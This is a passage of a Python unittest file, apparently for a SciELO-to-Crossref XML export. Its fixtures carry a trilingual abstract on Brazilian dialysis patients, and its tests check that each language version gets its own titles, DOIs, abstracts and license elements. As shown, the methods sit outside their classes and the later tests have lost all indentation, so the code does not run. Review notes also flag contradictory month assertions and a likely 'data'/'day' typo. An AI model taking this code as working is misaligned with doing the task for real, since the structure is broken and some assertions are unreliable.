                    {"a": "OBJECTIVE: To describe the clinical and epidemiological profile of patients under renal replacement therapies, identifying risk factors for death. METHODS: This is a non-concurrent cohort study of data for 90,356 patients in the National Renal Replacement Therapies Database. A deterministic-probabilistic linkage was performed using the Authorization System for High Complexity/Cost Procedures and the Mortality Information System databases. All patients who started dialysis between 1/1/2000 and 12/31/2004 were included and followed until death or the end of 2004. Age, sex, region of residence, primary renal disease and causes of death were analyzed. A proportional hazards model was used to identify factors associated with risk of death. RESULTS: The prevalence of patients under renal replacement therapies increased an average of 5.5%, while incidence remained stable during the period. Hemodialysis was the predominant initial modality (89%). The patients were majority male with mean age 53 years, residents of the Southeast region and presented unknown causes as the main cause of chronic renal disease, followed by hypertension, diabetes and glomerulonephritis. Of these patients, 42% progressed to death and 7% underwent kidney transplantation. The patients on peritoneal dialysis were older and had higher prevalence of diabetes. The death rate varied from 7% among transplanted patients to 45% among non-transplanted patients. In the final Cox proportional hazards model, the risk of mortality was associated with increasing age, female sex, having diabetes, living in the North and Northeast region, peritoneal dialysis as a first modality and not having renal transplantation. CONCLUSIONS: There was an increased prevalence of patients on renal therapy in Brazil. Increased risk of death was associated with advanced age, diabetes, the female sex, residents of the North and Northeast region and lack of renal transplant.",
                     "l": "en",
                     "_": ""},
                    {"a": "OBJETIVO: Describir el perfil epidemiol\u00f3gico y cl\u00ednico de pacientes en terapia renal substitutiva, identificando factores asociados al riesgo de muerte. M\u00c9TODOS: Estudio de observaci\u00f3n, prospectivo no concurrente, a partir de datos de 90.356 pacientes de la Base Nacional en Terapias Renales Substitutivas, en Brasil. Fue realizado reracionamiento determin\u00edstico-probabil\u00edstico del Sistema de Informaci\u00f3n de Mortalidad. Fueron incluidos todos los pacientes incidentes que iniciaron di\u00e1lisis entre 1/1/2000 y 31/12/2004, acompa\u00f1ados hasta la muerte o final de 2004. Edad, sexo, regi\u00f3n de residencia, enfermedad renal primaria, causa del \u00f3bito fueron analizados. Se ajust\u00f3 un modelo de riesgos proporcionales para identificar factores asociados al riesgo de muerte. RESULTADOS: Ocurri\u00f3 un aumento promedio de 5,5% en la prevalencia de pacientes en terapia, con relaci\u00f3n a la incidencia se mantuvo estable en el per\u00edodo. Hemodi\u00e1lisis fue la modalidad inicial predominante (89%). La mayor\u00eda de los pacientes era del sexo masculino, con edad promedio de 53 a\u00f1os, residente en la regi\u00f3n Sureste y presentaba causa indeterminada como principal causa b\u00e1sica de la enfermedad renal cr\u00f3nica, seguida de la hipertensi\u00f3n, diabetes y glomerulonefritis. De esos pacientes, 7% realizaron transplante renal y 42% evolucionaron a \u00f3bito. Los pacientes en di\u00e1lisis peritoneal eran m\u00e1s ancianos y presentaban mayor prevalencia de diabetes. Entre los no transplantados, 45% fueron a \u00f3bito y, entre los transplantadas 7%. En el modelo final de riesgos proporcionales de Cox, el riesgo de mortalidad estuvo asociado con el aumento de la edad, sexo femenino, tener diabetes, residir en la regi\u00f3n Norte y Noreste, di\u00e1lisis peritoneal como modalidad de entrada y no haber realizado transplante renal. CONCLUSIONES: Hubo aumento de la prevalencia de pacientes en terapia renal en Brasil. Pacientes con edad avanzada, diabetes, del sexo femenino, residentes en la regi\u00f3n Norte y Noreste y sin transplante renal presentan mayor riesgo de muerte.",
                     "l": "es",
                     "_": ""}
                ]
            },
            # a single cited reference, used by the citations pipe tests
            "citations": [
                {
                    "v30": [{"_": "Ethn Dis."}],
                    "v31": [{"_": "16"}],
                    "v32": [{"s": "2", "_": "2"}],
                    "v118": [{"_": "1"}],
                    "v12": [{"l": "en", "_": "End-stage renal disease in sub-Saharan Africa."}],
                    "v65": [{"_": "20060000"}],
                    "v64": [{"_": "2006"}],
                    "v14": [{"_": "2,5,9"}],
                    "v880": [{"_": "S0034-8910201000040000700001"}],
                    "v701": [{"_": "1"}],
                    "v865": [{"_": "20100800"}],
                    "v702": [{"_": "V:\\Scielo\\serial\\rsp\\v44n4\\markup\\07.htm"}],
                    "v10": [{"s": "Bamgboye", "r": "ND", "_": "", "n": "EL"}]
                },
            ],
            "issue": {
                "issue": {},
            },
        }
        self._article = Article(article_json)
def test_journal_article_element(self):
    """One journal_article per language, in pt/en/es order."""
    doi_batch = ET.Element('doi_batch')
    body_el = ET.SubElement(doi_batch, 'body')
    ET.SubElement(body_el, 'journal')
    pipe = export_crossref.XMLJournalArticlePipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    articles = xml.findall('.//journal_article')
    self.assertEqual(len(articles), 3)
    for ja, lang in zip(articles, ['pt', 'en', 'es']):
        with self.subTest(lang):
            self.assertEqual(ja.get('language'), lang)
def test_article_titles_element(self):
    """XMLArticleTitlesPipe adds one titles element to each journal_article."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLArticleTitlesPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    self.assertEqual(len(xml.findall('.//journal_article/titles')), 3)
def test_article_title_element(self):
    """The original (pt) title has no original_language_title; each
    translation carries the pt title back-reference with language='pt'."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'], 'titles')
    pipe = export_crossref.XMLArticleTitlePipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    pt_title = ('Perfil epidemiológico dos pacientes em terapia renal'
                ' substitutiva no Brasil, 2000-2004')
    expected = [
        (pt_title, None, None),
        ('Epidemiological profile of patients on'
         ' renal replacement therapy in Brazil, 2000-2004', 'pt', pt_title),
        ('Perfil epidemiológico de los pacientes en terapia'
         ' renal substitutiva en Brasil, 2000-2004', 'pt', pt_title),
    ]
    titles_nodes = xml.findall('.//titles')
    self.assertEqual(len(titles_nodes), 3)
    for titles, (title, orig_lang, orig_title) in zip(titles_nodes, expected):
        with self.subTest(title):
            self.assertEqual(titles.findtext('title'), title)
            self.assertEqual(
                titles.findtext('original_language_title'), orig_title)
            node = titles.find('original_language_title')
            lang = node.attrib.get('language') if node is not None else None
            self.assertEqual(lang, orig_lang)
def test_article_contributors_element(self):
    """Each of the three journal_article elements gets its own contributors."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLArticleContributorsPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    self.assertEqual(3, len(xml.findall('.//journal_article')))
    self.assertEqual(3, len(xml.findall('.//journal_article/contributors')))
def test_article_publication_date_element(self):
    """Every journal_article gets an online publication_date with the year.

    Removes a 40-line ``expected`` byte-string literal that was never used
    (dead code) and, worse, contradicted the live assertions below (it
    showed ``<month>08</month>`` while the loop asserts month is absent).
    """
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLArticlePubDatePipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    for i, pubdate in enumerate(
            xml.findall('.//journal_article//publication_date')):
        with self.subTest(label=i):
            self.assertEqual(pubdate.findtext('year'), '2010')
            # NOTE(review): asserting the month is absent contradicts the
            # single-document test above, which expects <month>08</month>;
            # confirm the intended pipe behaviour for multilingual docs.
            self.assertEqual(pubdate.findtext('month'), None)
            # NOTE(review): 'data' looks like a typo for 'day'; as written
            # it checks an element name that can never exist.
            self.assertEqual(pubdate.findtext('data'), None)
def test_article_pages_element(self):
    """The v14 page range (14-20) is replicated into every journal_article."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLPagesPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    for idx, pages in enumerate(xml.findall('.//journal_article//pages')):
        with self.subTest(label=idx):
            self.assertEqual(pages.findtext('first_page'), '14')
            self.assertEqual(pages.findtext('last_page'), '20')
def test_article_pid_element(self):
    """The PID identifier is written into every journal_article."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLPIDPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    for idx, item in enumerate(
            xml.findall('.//journal_article//publisher_item')):
        with self.subTest(label=idx):
            self.assertEqual(
                item.findtext('identifier'), 'S0034-89102010000400007')
def test_doi_data_elem_for_multilingue_document(self):
    """One doi_data element is created per journal_article."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLDOIDataPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    self.assertEqual(3, len(xml.findall('.//journal_article')))
    self.assertEqual(3, len(xml.findall('.//doi_data')))
def test_doi_elem_for_multilingue_document(self):
    """Each language version carries its own DOI from v337."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'], 'doi_data')
    pipe = export_crossref.XMLDOIPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    expected_dois = [
        '10.1590/S0034-89102010000400007',
        '10.1590/ID.en',
        '10.1590/ID.es',
    ]
    doi_nodes = xml.findall('.//doi_data/doi')
    self.assertEqual(3, len(xml.findall('.//journal_article')))
    self.assertEqual(3, len(doi_nodes))
    for label, (doi, expected) in enumerate(zip(doi_nodes, expected_dois)):
        with self.subTest(label=label):
            self.assertEqual(expected, doi.text)
def test_resource_elem_for_multilingue_document(self):
    """Each doi_data resolves to the language-specific HTML URL."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'], 'doi_data')
    pipe = export_crossref.XMLResourcePipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    base = ("http://www.scielo.br/scielo.php?"
            "script=sci_arttext&pid=S0034-89102010000400007&tlng=")
    resources = xml.findall('.//doi_data/resource')
    self.assertEqual(3, len(xml.findall('.//journal_article')))
    self.assertEqual(3, len(resources))
    for label, (node, lang) in enumerate(zip(resources, ['pt', 'en', 'es'])):
        with self.subTest(label=label):
            self.assertEqual(base + lang, node.text)
def test_article_abstracts_elem_for_multilingue_document(self):
    """All three abstracts (original + translations) are repeated under
    each of the three journal_article elements (JATS namespace)."""
    JATS = '{http://www.ncbi.nlm.nih.gov/JATS1}'
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'], 'doi_data')
    pipe = export_crossref.XMLArticleAbstractPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    abstracts = [raw.original_abstract()]
    abstracts.extend(raw.translated_abstracts().values())
    paragraphs = xml.findall('.//%sabstract/%sp' % (JATS, JATS))
    self.assertEqual(3, len(xml.findall('.//journal_article')))
    self.assertEqual(9, len(paragraphs))
    self.assertEqual(abstracts * 3, [p.text for p in paragraphs])
def test_related_item_for_multilingue_document(self):
    """The pt article links to both translations; each translation links
    back to the original DOI, all via isTranslationOf relations."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLProgramPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    original_title = ("Perfil epidemiológico dos pacientes em terapia"
                      " renal substitutiva no Brasil, 2000-2004")
    expected = [
        ('10.1590/ID.en',
         "Epidemiological profile of patients on"
         " renal replacement therapy in Brazil, 2000-2004"),
        ('10.1590/ID.es',
         "Perfil epidemiológico de los pacientes en terapia"
         " renal substitutiva en Brasil, 2000-2004"),
        ('10.1590/S0034-89102010000400007', original_title),
        ('10.1590/S0034-89102010000400007', original_title),
    ]
    self.assertEqual(3, len(xml.findall('.//program')))
    self.assertEqual(
        4, len(xml.findall('.//program/related_item/intra_work_relation')))
    self.assertEqual(
        4, len(xml.findall('.//program/related_item/description')))
    related_items = xml.findall('.//program/related_item')
    for label, (item, (doi, description)) in enumerate(
            zip(related_items, expected)):
        with self.subTest(label=label):
            self.assertEqual(description, item.findtext('description'))
            relation = item.find('intra_work_relation')
            self.assertEqual(doi, relation.text)
            self.assertEqual(
                'doi', relation.attrib.get('identifier-type'))
            self.assertEqual(
                'isTranslationOf',
                relation.attrib.get('relationship-type'))
def test_collection_for_multilingue_document(self):
    """Each doi_data gets a collection pointing at that language's PDF."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'], 'doi_data')
    pipe = export_crossref.XMLCollectionPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    expected_urls = [
        "http://www.scielo.br/pdf/rsp/v44n4/07.pdf",
        "http://www.scielo.br/pdf/rsp/v44n4/en_07.pdf",
        "http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
    ]
    self.assertEqual(3, len(xml.findall('.//doi_data//collection')))
    resource_nodes = xml.findall('.//doi_data/collection/item/resource')
    for node, url in zip(resource_nodes, expected_urls):
        with self.subTest(url):
            self.assertEqual(node.text, url)
def test_citations_for_multilingue_document(self):
    """Every journal_article carries its own citation_list."""
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ['pt', 'en', 'es'])
    pipe = export_crossref.XMLArticleCitationsPipe()
    raw, xml = pipe.transform([self._article, doi_batch])
    self.assertEqual(
        3, len(xml.findall('.//journal_article//citation_list')))
def test_every_journal_article_must_contain_own_license(self):
    """Each journal_article gets its own AccessIndicators program holding
    three license_ref elements plus free_to_read."""
    AI = "{http://www.crossref.org/AccessIndicators.xsd}"
    self._article.data["license"] = "by/4.0"
    doi_batch = create_xmlcrossref_with_n_journal_article_element(
        ["pt", "en", "es"]
    )
    pipe = export_crossref.XMLPermissionsPipe()
    _, xml = pipe.transform([self._article, doi_batch])
    self.assertEqual(3, len(xml.findall(".//" + AI + "program")))
    for journal_article in xml.findall(".//journal_article"):
        with self.subTest(journal_article=journal_article):
            programs = journal_article.findall(".//" + AI + "program")
            self.assertIsNotNone(programs)
            self.assertEqual(1, len(programs))
            self.assertEqual(
                3,
                len(programs[0].findall(AI + "license_ref")),
            )
            self.assertIsNotNone(
                programs[0].findall(AI + "free_to_read")
            )
def test_journal_article_should_not_contain_licenses(self):
    """Without license data no license_ref elements may be emitted.

    The previous assertion ``assertIsNotNone(xml.findall(...))`` was vacuous:
    ``findall`` always returns a list (possibly empty), never ``None``, so the
    test could never fail.  Assert the absence of ``license_ref`` elements
    instead, which is what the test name promises.
    """
    xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
        ["pt", "en", "es"]
    )
    data = [self._article, xmlcrossref]
    pipe = export_crossref.XMLPermissionsPipe()
    _, xml = pipe.transform(data)
    license_refs = xml.findall(
        ".//{http://www.crossref.org/AccessIndicators.xsd}license_ref"
    )
    self.assertEqual([], license_refs)
class ExportCrossRef_MultiLingueDoc_with_DOI_pt_es_Tests(unittest.TestCase):
    """Crossref export tests for a multilingual document where only the pt
    original and the es translation have DOIs in ``v337`` (en has none)."""

    def setUp(self):
        """Build the Article fixture shared by every test in this class.

        Identical to the MultipleDOI fixture except that ``v337`` lists
        DOIs only for pt and es — the en version has no DOI of its own.
        """
        article_json = {
            # per-language full-text URLs, by format
            "fulltexts": {
                "pdf": {
                    "es": "http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
                    "en": "http://www.scielo.br/pdf/rsp/v44n4/en_07.pdf",
                    "pt": "http://www.scielo.br/pdf/rsp/v44n4/07.pdf"
                },
                "html": {
                    "es": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=es",
                    "en": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=en",
                    "pt": "http://www.scielo.br/scielo.php?script=sci_arttext&pid=S0034-89102010000400007&tlng=pt"
                }
            },
            "collection": "scl",
            "doi": "10.1590/S0034-89102010000400007",
            "body": {
                "pt": "Body PT",
                "es": "Body ES",
                "en": "Body EN"
            },
            "article": {
                "v880": [{"_": "S0034-89102010000400007"}],  # PID
                "v237": [{"_": "10.1590/S0034-89102010000400007"}],  # document DOI
                "v223": [{"_": "20100801"}],  # publication date
                "v65": [{"_": "2010"}],  # publication year
                "v601": [{"_": "en"}, {"_": "es"},],  # translation languages
                "v40": [{"_": "pt"}],  # original language
                "v10": [{"s": "Bamgboye", "r": "ND", "_": "", "n": "EL"}],  # authors
                "v14": [{"f": "14", "l": "20",}],  # first/last page
                # titles per language (implicit string concatenation below)
                "v12": [
                    {"l": "pt",
                     "_": "Perfil epidemiológico dos pacientes em terapia"
                     " renal substitutiva no Brasil, 2000-2004"},
                    {"l": "en",
                     "_": "Epidemiological profile of patients on"
                     " renal replacement therapy in Brazil, 2000-2004"},
                    {"l": "es",
                     "_": "Perfil epidemiológico de los pacientes en terapia"
                     " renal substitutiva en Brasil, 2000-2004"}
                ],
                # DOIs only for pt and es — the defining trait of this class
                "v337": [
                    {"l": "pt", "d": "10.1590/S0034-89102010000400007",},
                    {"l": "es", "d": "10.1590/ID.es"}
                ],
                # abstracts per language
                "v83": [
                    {"a": "OBJETIVO: Descrever o perfil epidemiol\u00f3gico e cl\u00ednico de pacientes em terapia renal substitutiva, identificando fatores associados ao risco de morte. M\u00c9TODOS: Estudo observacional, prospectivo n\u00e3o concorrente, a partir de dados de 90.356 pacientes da Base Nacional em Terapias Renais Substitutivas, no Brasil. Foi realizado relacionamento determin\u00edstico-probabil\u00edstico do Sistema de Autoriza\u00e7\u00e3o de Procedimentos de Alta Complexidade/Custo e do Sistema de Informa\u00e7\u00e3o de Mortalidade. Foram inclu\u00eddos todos os pacientes incidentes que iniciaram di\u00e1lise entre 1/1/2000 e 31/12/2004, acompanhados at\u00e9 a morte ou final de 2004. Idade, sexo, regi\u00e3o de resid\u00eancia, doen\u00e7a renal prim\u00e1ria, causa do \u00f3bito foram analisados. Ajustou-se um modelo de riscos proporcionais para identificar fatores associados ao risco de morte. RESULTADOS: Ocorreu um aumento m\u00e9dio de 5,5% na preval\u00eancia de pacientes em terapia enquanto a incid\u00eancia manteve-se est\u00e1vel no per\u00edodo. Hemodi\u00e1lise foi a modalidade inicial predominante (89%). A maioria dos pacientes era do sexo masculino, com idade m\u00e9dia de 53 anos, residente na regi\u00e3o Sudeste, e apresentava causa indeterminada como principal causa b\u00e1sica da doen\u00e7a renal cr\u00f4nica, seguida da hipertens\u00e3o, diabetes e glomerulonefrites. Desses pacientes, 7% realizou transplante renal e 42% evoluiu para o \u00f3bito. Os pacientes em di\u00e1lise peritoneal eram mais idosos e apresentavam maior preval\u00eancia de diabetes. Entre os n\u00e3o transplantados, 45% foi a \u00f3bito e, entre os transplantados, 7%. No modelo final de riscos proporcionais de Cox, o risco de mortalidade foi associado com o aumento da idade, sexo feminino, ter diabetes, residir nas regi\u00f5es Norte e Nordeste, di\u00e1lise peritoneal como modalidade de entrada e n\u00e3o ter realizado transplante renal. CONCLUS\u00d5ES: Houve aumento da preval\u00eancia de pacientes em terapia renal no Brasil. Pacientes com idade avan\u00e7ada, diabetes, do sexo feminino, residentes nas regi\u00f5es Norte e Nordeste e sem transplante renal apresentam maior risco de morte.",
                     "l": "pt",
                     "_": ""},
                    {"a": "OBJECTIVE: To describe the clinical and epidemiological profile of patients under renal replacement therapies, identifying risk factors for death. METHODS: This is a non-concurrent cohort study of data for 90,356 patients in the National Renal Replacement Therapies Database. A deterministic-probabilistic linkage was performed using the Authorization System for High Complexity/Cost Procedures and the Mortality Information System databases. All patients who started dialysis between 1/1/2000 and 12/31/2004 were included and followed until death or the end of 2004. Age, sex, region of residence, primary renal disease and causes of death were analyzed. A proportional hazards model was used to identify factors associated with risk of death. RESULTS: The prevalence of patients under renal replacement therapies increased an average of 5.5%, while incidence remained stable during the period. Hemodialysis was the predominant initial modality (89%). The patients were majority male with mean age 53 years, residents of the Southeast region and presented unknown causes as the main cause of chronic renal disease, followed by hypertension, diabetes and glomerulonephritis. Of these patients, 42% progressed to death and 7% underwent kidney transplantation. The patients on peritoneal dialysis were older and had higher prevalence of diabetes. The death rate varied from 7% among transplanted patients to 45% among non-transplanted patients. In the final Cox proportional hazards model, the risk of mortality was associated with increasing age, female sex, having diabetes, living in the North and Northeast region, peritoneal dialysis as a first modality and not having renal transplantation. CONCLUSIONS: There was an increased prevalence of patients on renal therapy in Brazil. Increased risk of death was associated with advanced age, diabetes, the female sex, residents of the North and Northeast region and lack of renal transplant.",
                     "l": "en",
                     "_": ""},
                    {"a": "OBJETIVO: Describir el perfil epidemiol\u00f3gico y cl\u00ednico de pacientes en terapia renal substitutiva, identificando factores asociados al riesgo de muerte. M\u00c9TODOS: Estudio de observaci\u00f3n, prospectivo no concurrente, a partir de datos de 90.356 pacientes de la Base Nacional en Terapias Renales Substitutivas, en Brasil. Fue realizado reracionamiento determin\u00edstico-probabil\u00edstico del Sistema de Informaci\u00f3n de Mortalidad. Fueron incluidos todos los pacientes incidentes que iniciaron di\u00e1lisis entre 1/1/2000 y 31/12/2004, acompa\u00f1ados hasta la muerte o final de 2004. Edad, sexo, regi\u00f3n de residencia, enfermedad renal primaria, causa del \u00f3bito fueron analizados. Se ajust\u00f3 un modelo de riesgos proporcionales para identificar factores asociados al riesgo de muerte. RESULTADOS: Ocurri\u00f3 un aumento promedio de 5,5% en la prevalencia de pacientes en terapia, con relaci\u00f3n a la incidencia se mantuvo estable en el per\u00edodo. Hemodi\u00e1lisis fue la modalidad inicial predominante (89%). La mayor\u00eda de los pacientes era del sexo masculino, con edad promedio de 53 a\u00f1os, residente en la regi\u00f3n Sureste y presentaba causa indeterminada como principal causa b\u00e1sica de la enfermedad renal cr\u00f3nica, seguida de la hipertensi\u00f3n, diabetes y glomerulonefritis. De esos pacientes, 7% realizaron transplante renal y 42% evolucionaron a \u00f3bito. Los pacientes en di\u00e1lisis peritoneal eran m\u00e1s ancianos y presentaban mayor prevalencia de diabetes. Entre los no transplantados, 45% fueron a \u00f3bito y, entre los transplantadas 7%. En el modelo final de riesgos proporcionales de Cox, el riesgo de mortalidad estuvo asociado con el aumento de la edad, sexo femenino, tener diabetes, residir en la regi\u00f3n Norte y Noreste, di\u00e1lisis peritoneal como modalidad de entrada y no haber realizado transplante renal. CONCLUSIONES: Hubo aumento de la prevalencia de pacientes en terapia renal en Brasil. Pacientes con edad avanzada, diabetes, del sexo femenino, residentes en la regi\u00f3n Norte y Noreste y sin transplante renal presentan mayor riesgo de muerte.",
                     "l": "es",
                     "_": ""}
                ]
            },
            # a single cited reference, used by the citations pipe tests
            "citations": [
                {
                    "v30": [{"_": "Ethn Dis."}],
                    "v31": [{"_": "16"}],
                    "v32": [{"s": "2", "_": "2"}],
                    "v118": [{"_": "1"}],
                    "v12": [{"l": "en", "_": "End-stage renal disease in sub-Saharan Africa."}],
                    "v65": [{"_": "20060000"}],
                    "v64": [{"_": "2006"}],
                    "v14": [{"_": "2,5,9"}],
                    "v880": [{"_": "S0034-8910201000040000700001"}],
                    "v701": [{"_": "1"}],
                    "v865": [{"_": "20100800"}],
                    "v702": [{"_": "V:\\Scielo\\serial\\rsp\\v44n4\\markup\\07.htm"}],
                    "v10": [{"s": "Bamgboye", "r": "ND", "_": "", "n": "EL"}]
                },
            ],
            "issue": {
                "issue": {},
            },
        }
        self._article = Article(article_json)
def test_journal_article_element(self):
xmlcrossref = ET.Element('doi_batch')
body = ET.Element('body')
body.append(ET.Element('journal'))
xmlcrossref.append(body)
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLJournalArticlePipe()
raw, xml = xmlcrossref.transform(data)
langs = ['pt', 'es']
self.assertEqual(len(xml.findall('.//journal_article')), 2)
for ja, lang in zip(
xml.findall('.//journal_article'), langs):
with self.subTest(lang):
self.assertEqual(ja.get('language'), lang)
def test_article_titles_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(len(xml.findall('.//journal_article/titles')), 2)
def test_article_title_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'titles')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleTitlePipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('Perfil epidemiológico dos pacientes em terapia renal'
' substitutiva no Brasil, 2000-2004', None, None),
('Perfil epidemiológico de los pacientes en terapia'
' renal substitutiva en Brasil, 2000-2004', 'pt',
'Perfil epidemiológico dos pacientes em terapia renal'
' substitutiva no Brasil, 2000-2004'),
]
self.assertEqual(len(xml.findall('.//titles')), 2)
for titles, content in zip(xml.findall('.//titles'), expected_content):
with self.subTest(content[0]):
self.assertEqual(
titles.findtext('title'), content[0])
self.assertEqual(
titles.findtext('original_language_title'), content[2])
lang = titles.find('original_language_title')
if lang is not None:
lang = lang.attrib.get('language')
self.assertEqual(lang, content[1])
def test_article_contributors_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleContributorsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//journal_article/contributors')))
def test_article_publication_date_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//publication_date')))
for i, pubdate in enumerate(
xml.findall('.//journal_article//publication_date')):
with self.subTest(label=i):
self.assertEqual(pubdate.findtext('year'), '2010')
self.assertEqual(pubdate.findtext('month'), None)
self.assertEqual(pubdate.findtext('data'), None)
def test_article_pages_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPagesPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//pages')))
for i, node in enumerate(
xml.findall('.//journal_article//pages')):
with self.subTest(label=i):
self.assertEqual(node.findtext('first_page'), '14')
self.assertEqual(node.findtext('last_page'), '20')
def test_article_pid_element(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLPIDPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//publisher_item')))
for i, node in enumerate(
xml.findall('.//journal_article//publisher_item')):
with self.subTest(label=i):
self.assertEqual(
node.findtext('identifier'),
'S0034-89102010000400007')
def test_doi_data_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLDOIDataPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//doi_data')))
def test_doi_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLDOIPipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('10.1590/S0034-89102010000400007', 0),
('10.1590/ID.es', 2),
]
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//doi_data/doi')))
for doi, content in zip(
xml.findall('.//doi_data/doi'), expected_content):
with self.subTest(label=content[1]):
self.assertEqual(content[0], doi.text)
def test_resource_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLResourcePipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
("http://www.scielo.br/scielo.php?"
"script=sci_arttext&pid="
"S0034-89102010000400007&tlng=pt", 0),
("http://www.scielo.br/scielo.php?"
"script=sci_arttext&pid="
"S0034-89102010000400007&tlng=es", 2),
]
self.assertEqual(
2, len(xml.findall('.//journal_article')))
self.assertEqual(
2, len(xml.findall('.//doi_data/resource')))
for resource, content in zip(
xml.findall('.//doi_data/resource'), expected_content):
with self.subTest(label=content[1]):
self.assertEqual(content[0], resource.text)
def test_article_abstracts_elem_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleAbstractPipe()
raw, xml = xmlcrossref.transform(data)
abstracts = [raw.original_abstract()]
for body in raw.translated_abstracts().values():
abstracts.append(body)
abstract_nodes = xml.findall(
'.//{http://www.ncbi.nlm.nih.gov/JATS1}abstract/{http://www.ncbi.nlm.nih.gov/JATS1}p')
self.assertEqual(2, len(xml.findall('.//journal_article')))
self.assertEqual(6, len(abstract_nodes))
xml_abstracts = [a.text for a in abstract_nodes]
self.assertEqual(abstracts * 2, xml_abstracts)
def test_related_item_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLProgramPipe()
raw, xml = xmlcrossref.transform(data)
expected_content = [
('10.1590/ID.es',
"Perfil epidemiológico de los pacientes en terapia"
" renal substitutiva en Brasil, 2000-2004",
0
),
('10.1590/S0034-89102010000400007',
"Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004",
1
),
('10.1590/S0034-89102010000400007',
"Perfil epidemiológico dos pacientes em terapia"
" renal substitutiva no Brasil, 2000-2004",
2
),
]
self.assertEqual(
2, len(xml.findall('.//program')))
self.assertEqual(
2, len(xml.findall('.//program/related_item/intra_work_relation')))
self.assertEqual(
2, len(xml.findall('.//program/related_item/description')))
for related_item, content in zip(
xml.findall('.//program/related_item'), expected_content):
with self.subTest(label=content[2]):
self.assertEqual(
content[1], related_item.findtext('description'))
intra_work_relation = related_item.find('intra_work_relation')
self.assertEqual(
content[0], intra_work_relation.text)
